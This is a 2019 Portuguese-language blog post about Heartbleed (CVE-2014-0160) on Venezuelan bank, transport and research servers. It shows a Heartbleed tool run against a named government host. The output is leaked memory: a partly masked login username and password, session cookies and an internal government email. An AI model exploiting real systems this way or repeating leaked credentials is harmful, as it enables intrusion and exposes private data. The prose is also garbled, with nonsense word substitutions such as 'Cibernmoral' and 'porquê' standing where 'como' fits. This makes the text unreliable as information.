Venezuela: um desastre (também) cibernético

Na semana passada o site DefCon-Lab encontrou evidências de que a infraestrutura do Banco Venezolano de Crédito possuía a vulnerabilidade Heartbleed (CVE-2014-0160) e estava sendo utilizada por elementos maliciosos para mineração de criptomoeda Monero.

A existência de uma vulnerabilidade antiga porquê o HeartBleed é inacreditável, sobretudo numa instituição financeira, o que demonstra um nível de segurança lamentoso.

Considerando que o HeartBleed é uma vulnerabilidade antiga e muito grave, o estudo utilizou essa vulnerabilidade porquê plataforma de estudo.

A instabilidade cibernética parece ser endêmico na terreno de los hermanos del setentrião. Sem muito esforço, foi provável encontrar algumas centenas de servidores com essa vulnerabilidade, incluindo os setores financeiro, de P&D e de Transportes.

Um dos casos foi no Bandes (Banco de Desarrollo de Económico y Social de Venezuela). O Bandes é um Banco Público de fomento do desenvolvimento. Seria o equivalente ao BNDES no Brasil.

A resposta do teste da prova de concepção da vulnerabilidade confirma a presença do Heartbleed.



$ ./heartbleed xxxxxxx.bandes.gob.ve

...................................#.......
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://www.google.com/
Connection: keep-alive
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1

.
.... ......]..live
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1

loginOp=login&username=XXXincXX&password=XrMaXXXo20XX*&client=preferred..`/.^..D).....Y6535632d393533372d3364646161313936303664343b6578703d31333a313535313533363634313537313b76763d313a373b747970653d363a7a696d6272613b; JSESSIONID=1b6ub3g6r81gg1hxs806oz0jgv

;)U..u.....|e.X............ight></DiscoverRightsRequest></BatchRequest></soap:Body></soap:Envelope>...`...+.
#...Z.ontent-Disposition: form-data; name="subject"

Re: Paso a paso para xxxxxx los xxxxxxx 5 y 15
-----------------------------261531429532168
Content-Disposition: form-data; name="priority"


-----------------------------261531429532168
Content-Disposition: form-data; name="body"


----- Mensaje original -----
De: xxxxxx xxxxxxxxx <xxxxxx@intt.gob.ve>
Para: xxxxxx xxxxxx xxxxxx de xxxxxxxx <xxxxxxxxxxx@intt.gob.ve>
Enviado: Tue, 12 Feb 2019 11:38:32 -0400 (BOT)
Asunto: Re: Paso a paso para xxxxx los xxxxxxx 5 y 15

Buenos dias,

Dame un numero de telefono para comunicarme con usted.

Gracias.

Outro caso alarmante é a presença do heartbleed em salas de videoconferência de instituição de Pesquisa e Desenvolvimento da Venezuela.

Conclusão

A estudo quantitativa das vulnerabilidades encontradas já é surpreendente. O problema se torna mais crítico ao estudar qualitativamente as entidades venezuelanas afetadas.

A existência de uma vulnerabilidade antiga porquê o HeartBleed no mercado financeiro e em instituições críticas da Venezuela, porquê transportes e P&D, demonstra um nível de segurança lamentoso.

Além disso, revela a falta de políticas e estratégias nacionais para Segurança Cibernmoral, muito porquê a inexistência de entidade social ou militar com responsabilidade pátrio no matéria.

© 2019 Luís Eduardo Alló | Fórum | WikiAlló | Social | Privacidade| contato | Sobre |

Todos os direitos reservados. Desenvolvido por Luís Eduardo Alló